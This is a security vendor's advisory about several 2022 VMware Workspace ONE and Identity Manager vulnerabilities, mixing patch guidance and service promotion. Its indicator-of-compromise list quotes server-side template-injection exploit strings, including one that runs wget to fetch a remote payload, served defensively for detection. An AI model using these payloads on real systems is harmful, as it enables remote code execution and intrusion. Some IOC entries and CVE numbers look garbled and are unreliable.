Flash Notice: VMWare Vulnerabilities Found in Multiple Products

May 20, 2022

Overview of vmware vulnerabilities

Today, VMware issued patches for two security flaws discovered in Workspace ONE Access, Identity Manager, and vRealize Automation. The vulnerabilities are tracked as CVE-2022-22972 and CVE-2022-22973 and could be exploited to backdoor enterprise networks.

The first vulnerability, CVE-2022-22972 has a critical CVSS score of 9.8 and is an authentication bypass vulnerability that could allow threat actors who have network access to the UI, to gain unauthenticated administrative access. The second vulnerability, CVE-2022-22973 has a CVSS score of 7.8 and is a local privilege escalation vulnerability that could allow a threat actor with local access to gain elevated privileges to the “root” user on virtual appliances. The products impacted include NSX, vRealize Operations, vRealize Log Insight, and vRealize Network Insight.

VMware stated that only customers who have deployed a listed product are affected, including products and suites that offer VMware Identity Manager components as an optional installation. If your organization implements change management using the ITIL definitions of change types, you should consider these vulnerabilities an emergency.

CVE-2022-22972 and CVE-2022-22973 affect the following products/versions:

VMware Workspace ONE Access Appliance - 21.08.0.1
VMware Workspace ONE Access Appliance - 21.08.0.0
VMware Workspace ONE Access Appliance - 20.10.0.1
VMware Workspace ONE Access Appliance - 20.10.0.0
VMware Identity Manager Appliance - 3.3.6
VMware Identity Manager Appliance - 3.3.5
VMware Identity Manager Appliance - 3.3.4
VMware Identity Manager Appliance - 3.3.3

cisa warns of previous vmware vulnerabilities

In April 2022, VMware had two other flaws tracked as CVE-2022-22954 and CVE-2022-22960 that were being exploited by APT groups. According to CISA, the flaws involved threat actors chaining unpatched VMware vulnerabilities for full system control and reverse engineering the updates to develop an exploit within 48 hours. The threat actors also exploited disclosed vulnerabilities in unpatched devices.

The vulnerabilities affect versions of VMware Workspace ONE Access, VMware Identity Manager (vIDM), VMware vRealize Automation (vRA), VMware Cloud Foundation, and vRealize Suite Lifecycle Manager. The flaws have since been fixed by VMware, however, CISA stated that due to previous activity, they expect for attackers to quickly develop the capability to exploit the newest VMware vulnerabilities (CVE-2022-22972 and CVE-2022-22973) as well.

CVE-2022-22954 affects the following products/versions:

VMware Workspace ONE Access - 21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0
vIDM - 3.3.6, 3.3.5, 3.3.4, 3.3.3
VMware Cloud Foundation - 4.x
vRealize Suite LifeCycle Manager - 8.

CVE-2022-22960 affects the following products:

VMware Workspace ONE Access - 21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0
vIDM - 3.3.6, 3.3.5, 3.3.4, 3.3.3
vRA - 7.6
VMware Cloud Foundation, 3.x, 4.x,
vRealize Suite LifeCycle Manager, 8.x

According to an incident report published by the IT security company, Barracuda Networks, there have been probing attempts in the wild for CVE-2022-22954 and CVE-2022-2296. Some of the attempts include botnet operators and threat actors leveraging flaws, deploying variants of the Mirai botnet. If your organization is affected by these vulnerabilities, it is highly recommended that you patch immediately.

How Avertium is Protecting Our Customers:

Expanding endpoints, cloud computing environments, and accelerated digital transformation have decimated the perimeter in an ever-expanding attack surface. Avertium’s offers Attack Surface Management, so you’ll have no more blind spots, weak links, or fire drills.

Avertium recommends utilizing our service for DFIR (Digital Forensics and Incident Response) to help you rapidly assess, contain, eradicate, and recover from a security incident.
Implement XDR as a prevention method. Our XDR is a combination of monitoring software like LogRhythm, Microsoft Azure Sentinel, or AlienVault, combined with endpoint protection such as SentinelOne. XDR platforms enable cybersecurity through a technology focus by collecting, correlating, and analyzing event data from any source on the network. This includes endpoints, applications, network devices, and user interactions.
Avertium offers Zero Trust Architecture, like AppGate, to stop malware lateral movement.

Avertium's recommendations

Avertium and VMware recommend the following for CVE-2022-22972 and CVE-2022-22973.

In addition to the most recent updates, you can find mitigation directions for CVE-2022-22972 and CVE-2022-22973 here.

Avertium and CISA recommend the following for CVE-2022-22954 and CVE-2022-22960.

Administrators should conduct behavioral analysis on root accounts of vulnerable systems by:
Using the indicators listed in table 1 to detect potential malicious activity.
Reviewing systems logs and gaps in logs.
Reviewing abnormal connections to other assets.
Searching the command-line history.
Auditing running processes.
Reviewing local user accounts and groups.
Auditing active listening ports and connections.
In addition to the most recent updates, you can find mitigation directions for CVE-2022-22954 and CVE-2022-22960 here.

INDICATOR'S OF COMPROMISE (IOCS):

CVE-2022-22972 & CVE-2022-22973

dingo_jspy_webshell
http://20.10.0[.0]

CVE-2022-22954 & CVE-2022-22960

IP Address

- 136.243.75[.]136

Scanning, Exploitation Strings, and Commands

- catalog-portal/ui/oauth/verify
- portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("cat /etc/hosts")}
- /catalog
  portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("wget -U "Hello 1.0" -qO - http://[REDACTED]/one")}
- freemarker.template.utility[.Execute]
- /opt/vmware/certproxy/bing/certproxyService.sh
- /horizon/scripts/exportCustomGroupUsers.sh
- /horizon/scripts/extractUserIdFromDatabase.sh